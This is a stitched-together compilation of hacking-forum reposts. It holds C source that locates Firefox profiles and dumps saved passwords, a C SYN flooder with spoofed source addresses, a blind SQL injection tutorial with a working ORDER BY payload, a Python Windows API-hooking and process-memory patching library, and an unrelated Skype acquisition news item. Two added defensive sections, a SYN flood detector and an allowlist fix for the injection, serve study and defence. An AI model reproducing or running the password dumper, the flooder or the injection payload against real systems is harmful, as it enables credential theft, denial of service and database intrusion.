    char profilePath[_MAX_PATH] = "";
    char partialPath[] = "Application Data\\Mozilla\\Firefox";
    char profileFile[_MAX_PATH];
    char line[1024];
    DWORD pathSize = _MAX_PATH;
    char *finalProfilePath = NULL;
    int isDefaultFound = 0;
    HANDLE token;

    // Get current user's profile directory
    if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE )
    {
        printf("\n Failed to get current process token ");
        return NULL;
    }

    if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE )
    {
        printf("\n Failed to get user profile directory");
        return NULL;
    }

    printf("\n User Profile directory: %s\n", profilePath);

    // Get firefox profile directory
    strcpy(profileFile, profilePath);
    strcat(profileFile,"\\");
    strcat(profileFile,partialPath);
    strcat(profileFile,"\\profiles.ini");

    // Open the firefox profile setting file
    FILE *profile = fopen(profileFile, "r");

    if( profile == NULL )
    {
        printf("\n Unable to find firefox profile file: %s ", profileFile);
        return NULL;
    }

    // This indicates that we are looking under default profile
    while(fgets(line, 1024, profile))
    {
        StrLwr(line);

        if( !isDefaultFound && ( strstr(line, "name=default") != NULL) )
        {
            isDefaultFound = 1;
            continue;
        }

        // Found default profile / check for path
        if( isDefaultFound )
        {
            if( strstr(line,"path=") != NULL)
            {
                char *slash = strstr(line,"/");

                if( slash != NULL )
                    *slash = '\\';

                // remove \n from the end of line
                line[strlen(line)-1] = 0;

                char *start = strstr(line,"=");

                int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ;
                finalProfilePath = (char *) malloc(totalLen);

                if( finalProfilePath )
                {
                    strcpy(finalProfilePath,profilePath);
                    strcat(finalProfilePath,"\\");
                    strcat(finalProfilePath,partialPath);
                    strcat(finalProfilePath,"\\");
                    strcat(finalProfilePath,start+1);

                    printf("\n Final profile path: %s \n", finalProfilePath);
                }

                break;
            }
        }
    }

    fclose(profile);

    return finalProfilePath;
}

//-----------------------------------------------------------------------
char *GetFFVersion()
{
    char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox";
    char *FFVers = NULL;
    DWORD pathSize = _MAX_PATH;
    DWORD valueType;
    HKEY rkey;

    // Open firefox registry key
    if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
    {
        printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
        return NULL;
    }

    // Read the firefox path value
    if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS )
    {
        printf("\n Failed to read the firefox version from registry ");
        RegCloseKey(rkey);
        return NULL;
    }

    if( pathSize <= 0 || Vers[0] == 0)
    {
        printf("\n Path value read from the registry is empty");
        RegCloseKey(rkey);
        return NULL;
    }

    RegCloseKey(rkey);

    FFVers = (char*) malloc( strlen(Vers) + 1);

    if( FFVers )
        strcpy(Vers,FFVers);

    if (FFVers[1] == '1')
    {
        version = 1;
    }else{
        if (FFVers[1] == '2')
        {
            version = 2;
        }else{
            if (FFVers[1] == '3')
            {
                version = 3;
            }
        }
    }

    printf("\n Firefox version: %d", version);

    return (FFVers);
}

//-----------------------------------------------------------------------
int main(int argc, char* argv[])
{
    char *ProfilePath = NULL; //Profile path
    char *FFDir = NULL; //Firefox main installation path
    char buff[1024];

    ProfilePath = GetFFProfilePath();

    if( !DirectoryExists(ProfilePath))
    {
        printf("\n\n Firefox profile directory does not exist or no profiles found. \n");
        return 0;
    }

    FFDir = GetFFLibPath();

    if( !DirectoryExists(ProfilePath))
    {
        printf("\n\n Firefox installation path does not exist or is not installed. \n");
        return 0;
    }

    if( InitFFLibs(FFDir) )
    {
        if( InitializeNSSLibrary(ProfilePath) )
        {
            //Take 3 Mozilla dumps
            DumpCache(ProfilePath,"signons.txt");
            DumpCache(ProfilePath,"signons2.txt");
            DumpCache(ProfilePath,"signons3.txt");
            //DumpCache(ProfilePath,"signons.sqlite");

            //Dont forget to flush :/
            NSSUnload();
        }
    }

    printf("\n ======================= End Cache Dump =======================\n");

    while(1){
        Sleep(10000); //Just loop until user exits
    }
}
//-----------------------------------------------------------------------

Source: LeetCoders
-
[GNU Linux C] SYN Flooder source

Author: jakash3 (cred)

C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled.

Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data.

synflood.c

#include "tcpip.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <signal.h>
#include <errno.h>

ushort csum(short* data, int len);
char* randip(char* dst);
ushort rand16();
uint rand32();

int sd;

void help() {
    printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n");
    exit(1);
}

void quit(int sig) {
    close(sd);
    exit(0);
}

int main(int argc, char** argv) {
    if (argc!=3) help();

    /* Map CTRL-C to quit() */
    struct sigaction sa;
    sa.sa_handler = &quit;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGINT, &sa, 0);

    char rip[16];
    char packet[4096];
    struct iphdr ip;
    struct tcpph tph;
    struct tcphdr tcp;
    struct sockaddr_in sin;
    const int on = 1;

    memset(&packet, 0, 40);

    ip.ihl = 5;
    ip.ipv = 4;
    ip.tos = 0;
    ip.len = IPHDR_LEN + TCPHDR_LEN;
    ip.id = htons(rand16());
    ip.ttl = 64;
    ip.proto = IPPROTO_TCP;
    ip.src = (uint)inet_addr(randip(rip));
    ip.dst = (uint)inet_addr(argv[1]);
    ip.chksum = 0;
    ip.chksum = csum((short*)&ip, IPHDR_LEN);

    tcp.sport = htons((short)atoi(argv[2]));
    tcp.dport = htons((short)atoi(argv[2]));
    tcp.seq = htonl(rand32());
    tcp.offset = sizeof(struct tcphdr) / 4;
    tcp.flgs = TCP_SYN;
    tcp.chksum = 0;

    tph.src = ip.src;
    tph.dst = ip.dst;
    tph.zero = 0;
    tph.proto = IPPROTO_TCP;
    tph.tcp_len = sizeof(struct tcphdr);

    memmove(packet, &tph, TCPPH_LEN);
    memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
    tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);

    memmove(packet, &ip, IPHDR_LEN);
    memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);

    sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sd == -1) {
        printf("Failed to create socket. Error code: %d\n", errno);
        exit(1);
    }
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) {
        printf("Failed to set socket options. Error code: %d\n", errno);
        exit(1);
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(tcp.dport);
    memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr));

    while (1) {
        if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
            printf("Failed to send SYN packet(s). Error code: %d\n", errno);
            exit(1);
        } else {
            printf("Sent SYN packet with spoofed ip: %s\n", rip);
        }

        ip.id = htons(rand16());
        ip.src = (uint)inet_addr(randip(rip));
        ip.chksum = 0;
        ip.chksum = csum((short*)&ip, IPHDR_LEN);

        tph.src = ip.src;
        tcp.seq = htonl(rand32());
        tcp.chksum = 0;

        memmove(packet, &tph, TCPPH_LEN);
        memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
        tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);

        memmove(packet, &ip, IPHDR_LEN);
        memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);
    }
}

ushort csum(short* data, int len) {
    int sum = 0;
    for (; len > 1; len -= 2) sum += *data++;
    if (len == 1) sum += *(uchar*)data;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return ~sum;
}

/* The best I can do for generating a random ipv4 address */
char* randip(char* dst) {
    dst[0] = 0;
    int i, j, k;
    srandom(time(0));
    srand(random());
    srandom(rand());
    j = rand() + random();
    for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) {
        srand((int)dst + i + k);
        srand(j + dst[i+k] + (int)&i + rand());
        j = rand() % 255;
        sprintf(dst + i, "%d.", j);
    }
    dst[i-1] = 0;
    return dst;
}

ushort rand16() {
    srandom(time(0));
    srand(random());
    srandom(rand());
    return (random() + rand() + time(0)) % 65535;
}

uint rand32() {
    srandom(time(0));
    srand(random());
    srandom(rand());
    return (random() + rand() & time(0));
}

tcpip.h

#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>

typedef unsigned char uchar;
typedef unsigned short ushort;
typedef unsigned int uint;

/* Internet Datagram Header */
#define IPHDR_LEN 20
struct iphdr {
    uchar ipv:4;    /* Internet Protocol Version */
    uchar ihl:4;    /* Total length (in DWORDs) */
    uchar tos;      /* Type of Service */
    ushort len;     /* Total length */
    ushort id;      /* Identification number */
    ushort frag;    /* Fragment offset and flags */
    uchar ttl;      /* Time to live */
    uchar proto;    /* Protocol type */
    ushort chksum;  /* Checksum */
    uint src;       /* Source IP Address */
    uint dst;       /* Destination IP Address */
};

/* TCP Header */
#define TCPHDR_LEN 20
struct tcphdr {
    ushort sport;   /* Source Port */
    ushort dport;   /* Destination Port */
    uint seq;       /* Sequence number */
    uint ack;       /* Acknowledgement number */
    uchar reserved:4;
    uchar offset:4; /* Size of TCP Header in DWORDs */
    uchar flgs;     /* TCP Flags */
#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_PSH 0x08
#define TCP_ACK 0x10
#define TCP_URG 0x20
    ushort win;     /* Window. Size of data to accept */
    ushort chksum;  /* Checksum */
    ushort urgp;    /* idk */
};

/* TCP Psuedo-header */
#define TCPPH_LEN 12
struct tcpph {
    uint src;
    uint dst;
    uchar zero;
    uchar proto;
    ushort tcp_len;
};

Source: LeetCoders
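The half-open connections this post describes, seen from the monitoring side, as an added example that is not part of the original post or of jakash3's code: it counts unanswered SYNs per destination inside a sliding window and reports the traits of the burst. The packet tuples, addresses, window and threshold are constructed assumptions.

```python
from collections import defaultdict, deque


def detect_syn_floods(packets, window=5.0, threshold=50):
    """Return {(dst_ip, dst_port): alert} for every target whose number of
    unanswered SYNs seen within `window` seconds reaches `threshold`.

    `packets` is an iterable of (time, src_ip, src_port, dst_ip, dst_port, flags)
    sorted by time, where flags is "S", "SA", "A", ... (assumed record format).
    """
    pending = {}                 # (src, sport, dst, dport) -> time of the unanswered SYN
    recent = defaultdict(deque)  # (dst, dport) -> (time, 4-tuple) of SYNs in the window
    alerts = {}
    for ts, src, sport, dst, dport, flags in packets:
        conn = (src, sport, dst, dport)
        target = (dst, dport)
        if flags == "S":
            # A bare SYN creates a half-open entry on the server.
            pending[conn] = ts
            recent[target].append((ts, conn))
        elif "A" in flags and "S" not in flags:
            # The client's ACK completes the handshake; spoofed sources never send it.
            pending.pop(conn, None)

        queue = recent[target]
        while queue and ts - queue[0][0] > window:   # age out SYNs older than the window
            old_ts, old_conn = queue.popleft()
            if pending.get(old_conn) == old_ts:
                del pending[old_conn]

        half_open = [c for t, c in queue if pending.get(c) == t]
        if len(half_open) >= threshold and target not in alerts:
            alerts[target] = {
                "time": ts,
                "half_open": len(half_open),
                # Spoofed floods show close to one source address per SYN.
                "distinct_sources": len({c[0] for c in half_open}),
                # synflood.c sets source and destination port from the same argument.
                "sport_equals_dport": sum(1 for c in half_open if c[1] == c[3]),
            }
    return alerts


def build_sample():
    """Constructed traffic: ten completed handshakes and one burst of bare SYNs."""
    packets = []
    for i in range(10):                       # ordinary clients finish the handshake
        t = i * 0.3
        src = "203.0.113.%d" % (i + 1)
        packets.append((t, src, 40000 + i, "192.0.2.20", 443, "S"))
        packets.append((t + 0.05, src, 40000 + i, "192.0.2.20", 443, "A"))
    for i in range(80):                       # burst: new source every packet, no ACK
        src = "198.51.100.%d" % (i + 1)
        packets.append((1.0 + i * 0.01, src, 80, "192.0.2.10", 80, "S"))
    packets.sort(key=lambda p: p[0])
    return packets


if __name__ == "__main__":
    for target, alert in detect_syn_floods(build_sample()).items():
        print(target, alert)
```
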
-
Exploiting SQL Injection in ORDER BY on Oracle/MySQL

submitted by alla on 10 May, 2011 - 15:10

Consider the following piece of code:

    $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name";

The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection.

The way to exploit such SQL injection on MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here. I couldn't find any clues for Oracle though, so now that I have figured it out, here is how.

This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id . In this case it returns the following data:

    foo
    bar
    baz

We can try sorting by other columns and see if the data gets returned in different order. Say, if we try vulnerable.php?sortcolumn=something, we get back:

    bar
    baz
    foo

Now all we need to do is to get the query to sort the data by different column depending on the value of a given expression. In Oracle the following syntax works:

    ORDER BY (case when ((boolean_expression)) then id else something end)

If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this:

    vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end)

This will extract the most significant bit of the first character of the first row returned by "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation.

MySQL:
http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/
http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/

Source: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle
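The flaw in the post's query next to its fix, as an added example that is not part of the original article: with the ORDER BY string-built, the row order follows whatever expression the caller sends, and mapping the request value through an allowlist removes that. It uses Python's sqlite3 with constructed rows rather than Oracle, and filters on an assumed `owner` column so that several rows come back.

```python
import sqlite3


def make_db():
    """In-memory table with constructed rows matching the post's foo/bar/baz output."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE some_table (id INTEGER, something TEXT, owner INTEGER)")
    conn.executemany(
        "INSERT INTO some_table (id, something, owner) VALUES (?, ?, ?)",
        [(1, "foo", 7), (2, "bar", 7), (3, "baz", 7)],
    )
    return conn


def list_rows_vulnerable(conn, owner, sort_column):
    """The post's pattern: the WHERE value is bound, the ORDER BY is concatenated."""
    sql = "SELECT something FROM some_table WHERE owner=? ORDER BY " + sort_column
    return [row[0] for row in conn.execute(sql, (owner,))]


# Request value -> fixed SQL text. A bound parameter cannot stand in for a
# column name (ORDER BY ? sorts by a constant), so the identifier has to be
# chosen by the application, never copied from the request.
SORT_COLUMNS = {"id": "id", "something": "something"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_rows_safe(conn, owner, sort_column="id", direction="asc"):
    """Hardened form: only allowlisted column and direction reach the SQL text."""
    try:
        column = SORT_COLUMNS[sort_column]
        order = SORT_DIRECTIONS[str(direction).lower()]
    except (KeyError, TypeError):
        raise ValueError("unsupported sort request") from None
    sql = "SELECT something FROM some_table WHERE owner=? ORDER BY %s %s" % (column, order)
    return [row[0] for row in conn.execute(sql, (owner,))]


if __name__ == "__main__":
    conn = make_db()
    case_true = "(case when ((1=1)) then id else something end)"
    case_false = "(case when ((1=0)) then id else something end)"
    # The vulnerable query answers a yes/no question through row order alone.
    print(list_rows_vulnerable(conn, 7, case_true))    # sorted by id
    print(list_rows_vulnerable(conn, 7, case_false))   # sorted by something
    # The hardened query accepts the two known columns and rejects the rest.
    print(list_rows_safe(conn, 7, "something"))
    try:
        list_rows_safe(conn, 7, case_true)
    except ValueError as exc:
        print("rejected:", exc)
```
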
-
Microsoft confirms purchase of Skype for $8.5 billion

Tom Warren 2 hours ago

Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer.

“Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.”

Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms.

“Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said.

Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products.

Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009.

Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.”

Source: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors
-
API Hooking in Python

Author: cadaver (cred)

# patcher.py
# handles patching and unpatching of process memory.
# public domain code.

from ctypes import *
from win32api import *
from pytcc import pytcc
from struct import pack, unpack, calcsize
from win32gui import PyGetString, PySetMemory, PySetString
from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS
from distorm import Decode

DEBUG = True

def DB (msg):
    global DEBUG
    if DEBUG: print (msg)

def OpenProcess (pid=GetCurrentProcessId()):
    """Opens a process by pid."""
    DB ("[openProcess] pid:%s."%pid)
    phandle = windll.kernel32.OpenProcess (\
        PROCESS_ALL_ACCESS,
        False,
        pid )
    assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1]
    return phandle

def readMemory (phandle, address, size):
    """readMemory (address, size, phandle):"""
    cbuffer = c_buffer (size)
    success = windll.kernel32.ReadProcessMemory (\
        phandle,
        address,
        cbuffer,
        size,
        0 )
    assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1]
    return cbuffer.raw

def writeMemory (phandle, address=None, data=None):
    """Writes data to memory and returns the address."""
    assert data
    size = len (data) if isinstance (data, str) else sizeof (data)
    cdata = c_buffer (data) if isinstance (data, str) else byref (data)
    if not address: address = allocate (size, phandle)
    success = windll.kernel32.WriteProcessMemory (\
        phandle,
        address,
        cdata,
        size,
        0 )
    assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1]
    DB ("[write memory] :%s OK." % address)
    return address

def allocate (size, phandle):
    """Allocates memory of size in phandle."""
    address = windll.kernel32.VirtualAllocEx (\
        phandle,
        0,
        size,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE )
    assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1]
    DB ("[memory allocation] :%s" % address)
    return address

def releaseMemory (address, size, phandle):
    """Releases memory by address."""
    return windll.kernel32.VirtualFreeEx (\
        phandle,
        address,
        size,
        MEM_RELEASE )
    assert success, "Failed to read process memory!\n%s" % WinError(GetLastError()) [1]
    return cbuffer.raw

def transport (data, phandle):
    size = len (data)
    memory = allocate (size, phandle)
    writeMemory (phandle, memory, data)
    return memory

def get_patch (destination, params_size=0):
    """mov eax, destination
    call eax
    retn params_size
    """
    if isinstance (destination, (int,long)): destination = pack ("i", destination)
    if isinstance (params_size, (int,long)): params_size = pack ("h", params_size)
    return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size)

def get_cparams_size (cparams):
    if not cparams: return 0
    s = ''
    for param in cparams:
        s += "size += sizeof (%s);\n" % param
    c_code = """
int getsize ()
{
    int size = 0;
    %s
    return size;
}""" % s
    #DB (c_code)
    ccompiler = pytcc ()
    ccompiler.compile (c_code)
    ccompiler.relocate ()
    getsize = ccompiler.get_function ("getsize")
    size = getsize ()
    # ccompiler.delete ()
    return size

def get_cparams_size_b (cparams):
    return sum (map (calcsize, [param._type_ for param in cparams]))

def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000):
    """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000):
    Searches the instructions inside an API for a good place to patch."""
    # DEBUG
    if DEBUG == 2:
        bytes = PyGetString (apiaddress, needed_size * 2)
        dprint (apiaddress, bytes)
    # # # #
    aoffset = 0
    found_space = 0
    position = apiaddress
    while found_space < needed_size:
        bytes = PyGetString (position, 24)
        # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex(position)))
        # if does_code_end_function (bytes): raise "Function end found before enough space was found!"
        offset, size, instruction, hexstr = Decode (position, bytes) [0]
        if "ret" in instruction.lower (): raise "Function end found before enough space was found!"
        if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]):
            found_space += size
        else:
            found_space = 0
        aoffset += size
        if aoffset >= maxscan: raise "Maxscan exceeded while searching for a good spot to patch!"
        position += size
    return apiaddress + (aoffset - found_space)

class patcher:
    source = None
    destination = None
    jmp_asm = None
    original_bytes = None
    params_size = 0
    pid = None
    phandle = None
    duplicate_api = None
    original_api = None

    def __init__ (self,
                  source=None,
                  destination=None,
                  params_size=0,
                  pid=GetCurrentProcessId () ):
        self.set_pid (pid)
        self.set_source (source)
        self.set_destination (destination)
        self.set_params_size (params_size)

    def set_pid (self, pid):
        self.close ()
        self.phandle = OpenProcess (pid)
        self.pid = pid

    def set_source (self, source):
        self.source = source

    def set_destination (self, destination):
        self.destination = destination

    def set_params_size (self, size):
        self.params_size = size

    def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True):
        module = LoadLibrary (dllname)
        procedure = GetProcAddress (module, apiname)
        if free: FreeLibrary (module)
        assert procedure
        self.original_api = eval ("windll.%s.%s" % (dllname.strip(".dll"), apiname))
        self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size)))
        if DEBUG:
            DB ("found good spot to patch: %s %s. Offset from original api address: %s." \
                %(self.source, hex (self.source), self.source - procedure))

    def patch (self):
        assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!"
        assert not self.original_bytes, "Already patched!"
        self.jmp_asm = get_patch (self.destination, self.params_size)
        jmp_asm_size = len (self.jmp_asm)
        self.original_bytes = PyGetString (self.source, jmp_asm_size)
        assert self.original_bytes, "Failed to capture original_bytes."
        writeMemory (\
            phandle=self.phandle,
            address=self.source,
            data=self.jmp_asm)
        msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \
            % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes))
        DB (msg)

    def unpatch (self):
        if not self.original_bytes: raise "Not patched!"
        assert all ((self.phandle, self.source, self.destination)), "Not initialized!"
        writeMemory (\
            phandle=self.phandle,
            address=self.source,
            data=self.original_bytes )
        self.original_bytes = None

    def close (self):
        if self.phandle:
            windll.kernel32.CloseHandle (self.phandle)
            self.phandle = None

    def release (self):
        if self.phandle and self.duplicate_api:
            releaseMemory (self.duplicate_api, 0, self.phandle)

    def call_original_api (self, *args, **kwargs):
        return self.original_api (*args, **kwargs)

    def call_duplicate_api (self, types, *args, **kwargs):
        return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs)

    def __del__ (self):
        try:self.unpatch ()
        except:pass
        try:self.release ()
        except:pass
        try:self.close ()
        except:pass

def dprint (a, c):
    """Pretty prints disassembled bytes. dprint (offset, bytes)."""
    x = Decode (a, c)
    print "[deci addr : hexi addr] [size] instruction\n"
    for offset, size, instruction, hexstr in x:
        print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction)
        a += size
    print

#cad

# tramper.py
# Relocates bytes of an API and creates a jump from those bytes to the original API affectively negating a hook.
# TODO !Recalculate Relocated Relative jmp and call addresses.
# public domain code.

from ctypes import *
from win32api import *
from pytcc import pytcc
from struct import pack, unpack
from win32gui import PyGetString, PySetMemory, PySetString
from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS
from distorm import Decode
from patcher import OpenProcess, readMemory, writeMemory, allocate, transport

DEBUG = True

def DB (msg):
    global DEBUG
    if DEBUG: print (msg)

def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"):
    """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"):
    Creates a duplicate API using the trampoline method and returns its address.
    """
    if DEBUG: global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes
    if not apiaddress:
        dll = LoadLibrary (dllname)
        apiaddress = GetProcAddress (dll, apiname)
    landing_offset = 0
    hprocess = OpenProcess ()
    original_bytes = PyGetString (apiaddress, 300)
    tramp_memory = allocate (len (original_bytes) + 50, hprocess)
    print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory))
    instructions = Decode (apiaddress, original_bytes)
    sizes = iter ([X[1] for X in instructions])
    while landing_offset < hook_size:
        landing_offset += sizes.next ()
    landing_address = apiaddress + landing_offset
    DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset)))
    DB ("Landing address: %s %s" % (landing_address, hex (landing_address)))
    distance = landing_address - (tramp_memory +landing_offset)
    DB ("Distance: %s %s." % (distance, hex (distance)))
    tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction
    instructions = Decode (apiaddress, tramp_code)
    boffset = 0
    for offset, size, instruction, hexstr in instructions:
        if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]):
            raise "[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset)
        boffset += size
    #
    # TODO !Recalculate Relocated Relative jmp and call addresses.
    #
    jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump)
    tramp_code += jump_code
    # DEBUG
    DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code))))
    DB ("Tramper api decode.")
    if DEBUG: dprint (apiaddress, tramp_code)
    # # # #
    writeMemory (hprocess, tramp_memory, tramp_code)
    CloseHandle (hprocess)
    return tramp_memory

def dprint (a, c):
    """ pretty print disassembled bytes. dprint (offset, bytes)."""
    x = Decode (a, c)
    print "[deci addr : hexi addr] [size] instruction\n"
    for offset, size, instruction, hexstr in x:
        print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction)
        a += size

if __name__ == "__main__":
    # Test.
    lib = LoadLibrary ("kernel32")
    OpenProcessAddr = GetProcAddress (lib, "OpenProcess")
    FreeLibrary (lib)
    trampAddr = tramper (\
        apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate.
        hook_size=10, # size of our API jmp code. (minimum size of relocated API bytes)
        apiname=None, # (optional)
        dllname="kernel32") # (optional / defaults to kernel32)
    # Prototype the OpenProcess trampoline.
    duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr)
    pid = GetCurrentProcessId ()
    print "Calling duplicate OpenProcess with pid: %s" % pid
    phandle = duplicate_OpenProcess (0x1f0fff, 0, pid)
    print "Return value: %s." %phandle
    if phandle: CloseHandle (phandle)

#cad

# hooker.py
# deals with hooking of win32 APIs.
# public domain code.

from patcher import *
from tramper import tramper
from win32api import *
from pytcc import pytcc

def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"):
    """ create_hook (pat, duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"):
    """
    c_code =\
"""
%s function (int caller, %s)
{
    %s
    %s RET = DUPE ( %s );
    %s
    return RET;
}"""
    cargs = ''
    symbols = ''
    for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        symbols += "%s, " % char
        cargs += "%s %s, " % (arg, char)
    symbols = symbols [:-2]
    cargs = cargs [:-2]
    c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic)
    ccompiler = pytcc ()
    ccompiler.add_lib_proc ("msvcrt.dll", "memset")
    ccompiler.add_symbol ("DUPE", duplicate_api)
    ccompiler.compile (c_code)
    ccompiler.relocate ()
    hook = ccompiler.get_symbol ("function")
    return (c_code, hook)

def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"):
    """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"):
    """
    pat = patcher ()
    params_size = get_cparams_size (cparam_types)
    pat.set_params_size (params_size)
    pat.set_source_as_api (apiname, dllname)
    hook_size = len (get_patch (pat.destination, pat.params_size))
    tramp = tramper (pat.source, hook_size)
    pat.duplicate_api = tramp
    hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype)
    pat.c_code = hook_ccode
    pat.set_destination (hooks)
    return pat

if __name__ == '__main__':
    # Test.
    hook = hooker (\
        # API to hook
        apiname="OpenProcess",
        # the DLL the API is in. (defaults to kernel32)
        dllname="kernel32",
        # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively.
        cparam_types=["int", "int", "int"],
        # (required) the API return type.
        restype="int",
        # (optional) this is the code in our hook wich is executed Before the real API.
        prelogic="if (C==1) {return 1111;}",
        # (optional) this is the code in our hook wich is executed After the real API. The real API's return value is named RET.
        postlogic="if (RET) {return 0;}"
        )
    # hook API.
    # hook automatically unhooks itself and cleans up when it isnt refered to anymore.
    hook.patch ()
    print "Calling hooked OpenProcess api with process id as 1."
